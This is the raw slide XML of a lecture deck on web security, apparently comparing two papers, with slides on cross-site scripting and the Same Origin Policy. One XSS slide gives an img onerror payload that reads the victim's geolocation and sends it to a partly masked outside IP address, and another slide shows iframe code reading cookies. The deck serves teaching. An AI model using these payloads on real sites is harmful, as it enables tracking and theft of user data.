              <a:rPr sz="3000"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1"/>
              <a:t>Solutions for paper 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Comparison between the two papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Conclusions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image2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27471" y="4615072"/>
            <a:ext cx="1527507" cy="421276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Shape 543"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894144" y="128163"/>
            <a:ext cx="5356767" cy="566254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25252" tIns="25252" rIns="25252" bIns="25252" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="1587" algn="ctr" defTabSz="457200">
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="596900" algn="l"/>
                <a:tab pos="901700" algn="l"/>
                <a:tab pos="1206500" algn="l"/>
                <a:tab pos="1511300" algn="l"/>
                <a:tab pos="1803400" algn="l"/>
                <a:tab pos="2108200" algn="l"/>
                <a:tab pos="2413000" algn="l"/>
                <a:tab pos="2717800" algn="l"/>
                <a:tab pos="3022600" algn="l"/>
                <a:tab pos="3327400" algn="l"/>
                <a:tab pos="3619500" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
                <a:tab pos="4229100" algn="l"/>
                <a:tab pos="4533900" algn="l"/>
                <a:tab pos="4838700" algn="l"/>
                <a:tab pos="5143500" algn="l"/>
                <a:tab pos="5435600" algn="l"/>
                <a:tab pos="5740400" algn="l"/>
                <a:tab pos="6045200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="B204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B20400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Shape 544"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894144" y="694411"/>
            <a:ext cx="5356767" cy="3808257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25252" tIns="25252" rIns="25252" bIns="25252" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="536007" lvl="0" indent="-286769" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buSzPct val="156000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a: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Pages that are susceptible to XSS attacks often allow users to add content to the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="536007" lvl="0" indent="-286769" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buSzPct val="156000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a: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Simple attack vectors: webblog comments, message board posting, adding to a wiki</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="536007" lvl="0" indent="-286769" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buSzPct val="156000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a: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Add the following content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="249235" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr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 indent="249235" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr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&lt;script type="text/javascript"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="249235" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr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alert('vulnerable');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="249235" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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&lt;/script&gt;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" grpId="1" build="p" bldLvl="5" animBg="1" advAuto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600"/>
              </a:spcBef>
              <a:defRPr sz="3000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Shape 547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t>&lt;img src=x onerror=</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>navigator.geolocation.watchPosition(</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>function(loc){</a:t>
            </a:r>
            <a:br/>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>					</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>m=’Latitude:’+loc.coords.latitude+</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t> ’\n’+’Longitude:’+loc.coords.longitude;</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t> alert(m);</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t> b=document.createElement(’img’);</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t> b.src=’http://128.***.213.66:5556?c=’+m })&gt;</a:t>
            </a:r>
            <a:br/>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>	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image2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27471" y="4615072"/>
            <a:ext cx="1527507" cy="421276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Shape 550"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894144" y="128163"/>
            <a:ext cx="5356767" cy="566254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25252" tIns="25252" rIns="25252" bIns="25252" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="1587" algn="ctr" defTabSz="457200">
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="596900" algn="l"/>
                <a:tab pos="901700" algn="l"/>
                <a:tab pos="1206500" algn="l"/>
                <a:tab pos="1511300" algn="l"/>
                <a:tab pos="1803400" algn="l"/>
                <a:tab pos="2108200" algn="l"/>
                <a:tab pos="2413000" algn="l"/>
                <a:tab pos="2717800" algn="l"/>
                <a:tab pos="3022600" algn="l"/>
                <a:tab pos="3327400" algn="l"/>
                <a:tab pos="3619500" algn="l"/>
                <a:tab pos="3924300" algn="l"/>
                <a:tab pos="4229100" algn="l"/>
                <a:tab pos="4533900" algn="l"/>
                <a:tab pos="4838700" algn="l"/>
                <a:tab pos="5143500" algn="l"/>
                <a:tab pos="5435600" algn="l"/>
                <a:tab pos="5740400" algn="l"/>
                <a:tab pos="6045200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="B204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B20400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Shape 551"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894144" y="694411"/>
            <a:ext cx="5356767" cy="3808257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25252" tIns="25252" rIns="25252" bIns="25252" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="536007" lvl="0" indent="-286769" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buSzPct val="156000"/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a: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Working with </a:t>
            </a:r>
            <a:r>
              <a:rPr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iframes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827520" lvl="1" indent="-178232" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzPct val="156000"/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1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A parent window can get a reference to a frame’s document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="649287" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1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var x = document.getElementById("myframe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="649287" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1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var y = </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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x.contentDocument</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="649287" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1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document.write(y.cookie);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="934781" lvl="1" indent="-285494" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzPct val="156000"/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="16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827520" lvl="1" indent="-178232" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzPct val="156000"/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="520700" algn="l"/>
                <a:tab pos="825500" algn="l"/>
                <a:tab pos="1130300" algn="l"/>
                <a:tab pos="1435100" algn="l"/>
                <a:tab pos="1727200" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2641600" algn="l"/>
                <a:tab pos="2946400" algn="l"/>
                <a:tab pos="3251200" algn="l"/>
                <a:tab pos="3543300" algn="l"/>
                <a:tab pos="3848100" algn="l"/>
                <a:tab pos="4152900" algn="l"/>
                <a:tab pos="4457700" algn="l"/>
                <a:tab pos="4762500" algn="l"/>
                <a:tab pos="5067300" algn="l"/>
                <a:tab pos="5359400" algn="l"/>
                <a:tab pos="5664200" algn="l"/>
                <a:tab pos="5969000" algn="l"/>
                <a:tab pos="6273800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1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How is this safe for something like </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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&lt;iframe src=“http://www.twitter.com”&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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?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457200" y="20637"/>
            <a:ext cx="8229600" cy="56807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859536">
              <a:defRPr sz="35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04617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>App Development Comparison</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166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74232"/>
            <a:ext cx="9144000" cy="43436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322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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Shape 5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sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8556790" y="4670087"/>
            <a:ext cx="548704" cy="1851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300"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="558" name="image3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2892" y="0"/>
            <a:ext cx="7546866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322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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Shape 5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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Shape 562"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8556790" y="4670087"/>
            <a:ext cx="548704" cy="1851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300"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="563" name="image3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1839" y="260449"/>
            <a:ext cx="7829189" cy="51435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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Shape 566"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="983298"/>
            <a:ext cx="8229600" cy="372570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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Background and motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Overall problem definition and challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Related work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000"/>
              <a:t>Solutions for paper 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
